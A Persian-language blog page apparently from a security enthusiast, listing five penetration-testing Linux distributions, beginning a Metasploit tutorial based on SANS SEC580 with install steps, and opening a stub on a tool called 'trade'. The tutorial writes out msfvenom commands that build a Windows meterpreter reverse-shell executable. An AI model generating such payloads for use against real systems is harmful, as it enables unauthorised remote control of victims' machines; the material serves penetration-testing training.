نوشته‌ها

۵ توزیع لینوکسی جذاب برای هکرها

۵ توزیع لینوکسی جذاب برای هکرها

در این پست با هم ۵ توزیع لینوکسی که بین هکرها (چه کلاه سفید و چه کلاه سیاه) محبوب است را بررسی می‌کنیم.

برای راحتی کار شما لینک سایت مرجع هر توزیع در کنار توضیحات قرار می‌گیرد.

همین ابتدای کار لازمه به این مورد اشاره کنم که شما با انتخاب یک سیستم‌عامل هکر نمی‌شوید. یادگیری هک و تبدیل شدن به یک هکر نیاز به تلاش فراوان و یادگیری مطالب مختلف دارد.

نصب کالی لینوکس کسی را هکر نمی‌کند. بلکه این دانش شما و تفکر شماست که از شما یک متخصص امنیت یا هکر می‌سازد.

در لیستی که امروز خدمتتون ارائه میشه، از توزیع‌های محبوبی نام می‌بریم که توسط بسیاری از نفوذگران استفاده میشه اما این به این معنا نیست که شما به این لیست محدود می‌شوید، بلکه می‌توانید از سایر توزیع‌های لینوکسی نیز استفاده کنید.

۱-Kali Linux

5 توزیع لینوکسی جذاب برای هکرها

 

کالی‌لینوکس یکی از قدرتمند‌ترین و محبوب‌ترین توزیع‌های هک‌و‌امنیت لینوکس است. کالی برپایه دبیان است و بصورت پیش فرض حدودا ۳۰۰ ابزار هک و امنیت رو شامل می‌شود.

کارایی مهمترین دغدغه توسعه‌دهندگان کالی است و هرگاه متوجه شوند ابزاری بروزرسانی نمی‌شود یا کارایی خود را از دست داده است، سریعا آن را از کالی حذف می‌کنند. کالی در ورژن ۲۰۱۷ خود بیش از ۷۰۰ ابزار داشت اما توسعه دهندگان شروع به گلچین کردن ابزارها کردند و حدودا ۳۰۰ ابزار قدرتمند را در کالی قرار داده‌اند.

این سیستم‌عامل متعلق به شرکت Offensive Security است و اولین بار در سال ۲۰۱۳ با هدف جایگزینی سیستم‌عامل قدیمی Backtrack معرفی شد و توانست بخوبی جایگزین Backtrack شود.

کالی مشکل شبکه و شناسایی کارت شبکه که در Backtrack باعث اذیت شدن کاربران بود را ندارد.

برای راحتی کار با این سیستم عامل بهتر است که از ۲ گیگ رم استفاده شود تا هیچ تاخیری در عملکرد سیستم عامل مشاهده نشود.

لینک سایت رسمی: https://www.kali.org

۲-Cyborg Linux

6 توزیع لینوکسی جذاب برای هکرها

 

توزیع cyborg لینوکس، برپایه اوبونتو و توسط برنامه‌نویسان هندی توسعه پیدا کرده است.

محیط دسکتاپ این سیستم‌عامل گنوم است و در دسته‌بندی امنیت و تست نفوذ قرار دارد.

این سیستم عامل در دو نسخه ۶۴ و ۳۲ بیت عرضه شده است.

در این توزیع بصورت پیش فرض بیش از ۷۵۰ ابزار مخصوص هک و امنیت وجود دارد.

Cyborg توانایی اجرا بصورت live با همان قدرت اصلی خود را دارد.

ابزار های این سیستم‌عامل در دسته‌های زیر قرار دارند :

  • اکسپلویت‌نویسی
  • جمع‌آوری اطلاعات
  • تست‌نفوذ
  • افزایش سطح دسترسی
  • هک سخت‌افزار
  • تست‌های نرم‌افزاری
  • مهندسی اجتماعی
  • فارنزیک
  • امنیت‌موبایل
  • امنیت شبکه‌های وایرلس
  • آنالیز سخت افزار
  • RFID/NFC

لینک سایت رسمی: https://sourceforge.net/projects/cyborghawk1/files/latest/download

 

۳-BlackArch

6 توزیع لینوکسی جذاب برای هکرها

 

BlackArch بر پایه سیستم‌عامل Arch Linux توسعه پیدا کرده است.

در اصل BlackArch همان Arch Linux است که مخصوص هک و امنیت است و برای اینکار بهینه شده است.

بیش از ۲۰۰۰ ابزار مخصوص هک و امنیت در مخزن این سیستم‌عامل در دسترس است که براحتی می‌توانید آنها را نصب و استفاده کنید.

این سیستم عامل شباهت بسیاری به کالی لینوکس و Parrot OS دارد اما از لحاظ میزکاری، متنوع‌تر است و به کاربر اجازه می‌دهد میز کار را خودش انتخاب کند.

محیط مشکی و قرمز این توزیع بسیار جذاب است.

 

لینک سایت رسمی: https://www.blackarch.org

 

۴-Parrot OS

6 توزیع لینوکسی جذاب برای هکرها

 

parrot یکی از زیباترین لینوکس‌ها است که برای هک و امنیت توسعه پیدا کرده است.

این سیستم‌عامل برپایه دبیان است و توسط تیم ایتالیایی Frozenbox توسعه داده شده است.

محیط دسکتاپ این سیستم عامل MATE و KDE plasma است.

هدف اصلی این سیستم عامل، هک و امنیت است و بصورت پیش‌فرض ابزارهای مخصوص هک و امنیت بر روی این سیستم عامل نصب هستند.

 

Parrot OS خود شامل ۳ نسخه می شود:

نسخه HOME : مخصوص کاربران خانگی و کارهای روزمره است

نسخه ARM : مخصوص نصب بر روی Raspberry Pi و Orange Pi

نسخه SECURITY : مخصوص متخصصان هک و امنیت که شامل ابزارهای متنوع این حوزه می‌باشد.

 

لینک سایت رسمی: https://www.parrotsec.org

 

۵-BackBox

6 توزیع لینوکسی جذاب برای هکرها

 

یکی دیگر از توزیع‌های جذاب لینوکس است که بر پایه اوبونتو توسعه پیدا کرده است.

BackBox از میز کار XFCE استفاده می‌کند و رابط کاربری ساده‌ای دارد.

دسته بندی‌های مختلفی مانند فارنزیک، جمع آوری اطلاعات، تست‌نفوذ و شناسایی آسیب‌پذیری، شنود، اکسپلویت‌نویسی ، مهندسی اجتماعی و … در این سیستم عامل وجود دارد.

اولین نسخه این سیستم عامل در سال ۲۰۱۰ عرضه شد.

 

لینک سایت رسمی: https://www.backbox.org

آموزش SEC580 – بخش اول

سلام خدمت شما

امروز تصمیم گرفتم که دوره SEC580 رو به صورت متنی در وب سایت شخصی خودم منتشر کنم تا چراغ راهی باشه برای علاقه‌مندان به مباحث تست نفوذ از طریق متاسپلویت که بتوانند به صورت رایگان به این محتوای ارزشمند دسترسی داشته باشند.

با توجه به درگیری‌های کاری سعی می کنم هر هفته ۱ تا ۲ پارت از این آموزش را منتشر کنم.دوره به صورت فشرده و کوتاه خواهد بود.

آموزش SEC580 - بخش اول

دوره آموزشی SEC580 از دوره‌های موسسه SANS است که به آموزش ابزار قدرتمند متاسپلویت می پردازد.

ابتدا باید ببینیم متاسپلویت چیست؟

متاسپلویت در ژوئیه سال ۲۰۰۳ ایجاد شد است. نسخه ۱٫۰ نوشته شده با زبان پرل و شامل رابط کاربری گرافیکی بر اساس curses است. نسخه سوم به‌طور کامل به زبان روبی بازنویسی شد و توسط Metasploit, LLC توسعه یافت. (تأسیس شده توسط توسعه دهندگان در سال ۲۰۰۶).

شما با استفاده از این فریم ورك می‌توانید آسیب پذیری‌هاي موجود در سیستم‌ها، پروتکل‌ها و نرم افزارهاي مختلف را شناسایی کرده و آنها را مورد نفوذ و یا حمله قرار دهید.

این اپلیکیشن به صورت پیش فرض  دارای اکسپلویت‌هاي بسیاری می‌باشد ولی علاوه بر آن شما می‌توانید اکسپلویت مورد نظر خودتان را ایجاد و به آن اضافه کنید.

نصب فریم ورک متاسپلویت

این فریم ورک به صورت پیش فرض در سیستم عامل کالی لینوکس وجود دارد و شما می‌توانید به راحتی از آن استفاده کنید.

اما اگر مایل به نصب متاسپلویت بر روی توزیع دیگری از لینوکس هستید، مشکلی وجود ندارد.باید به این شکل عمل کنید.

sudo apt-get install gpgv2 autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev libpcap-dev libpq-dev libreadline6-dev libsqlite3-dev libssl-dev libsvn1 libtool libxml2 libxml2-dev libxslt-dev libyaml-dev locate ncurses-dev openssl postgresql postgresql-contrib wget xsel zlib1g zlib1g-dev

پس از نصب وارد لینک زیر شوید و فایل metasploit.run را دانلود کنید

https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version

به ترتیب دستورات را وارد کنید:

mkdir /opt/metasploit

mv metasploit.run /opt/metasploit

chmod +x metasploit.run

./metasploit.run

پس نصب دستور msfconsole را وارد کنید تا محیط متاسپلویت برای شما اجرا شود.

حال نیاز است که با بخش‌های مختلف این فریم ورک آشنا شویم.

متاسپلویت دارای ماژول های مختلفی و تقسیم بندی های مختلفی است که به شرح زیر می باشند تعداد ۱۸۸۶ اکسپلویت، تعداد ۱۰۶۵ Auxiliary ، تعداد ۳۲۸ ماژولPost ، تعداد ۵۴۶ Payload و تعداد ۴۴ encoder و ۱۰ Nops و ۲ evasion.

متااسپلویت چندین رابط کاربری دارد. در گذشته رابط های آن بیشتر بود برای مثال msfcli و msfencode که جای خود را به msfpayload دادند.

بریم سراغ تست ابزار:

 قصد دارم یک Payload برای سیستم عامل ویندوز با استفاده از msfpayload ایجاد کنم. این رابط کاربری متاسپلویت وظیفه msfcli و msfencode را انجام می دهد.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe

با استفاده از سوییچ -p ، Payload مد نظر را تعیین میکنیم. به جای<Local Port>  یک Port را وارد کنید برای مثال ۴۴۴۴٫

 به جای Local IP Address درواقع IP سیستم خود را وارد کنید.

 با استفاده از سوییچ -f فرمت فایل و در آخر هم خروجی را در یک فایل exe با نام shell قرار دادیم .

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.40 LPORT=4444 -f exe > shell.exe

آموزش ابزار trade

آموزش ابزار trade

در این پارت از آموزش نحوه کار کردن با ابزار trade به عنوان یکی از ابزارهای بسیار خوب در زمینه جمع آوری اطلاعات و کلاینت هکینگ آشنا خواهید شد.

آموزش در محیط کالی لینوکس است.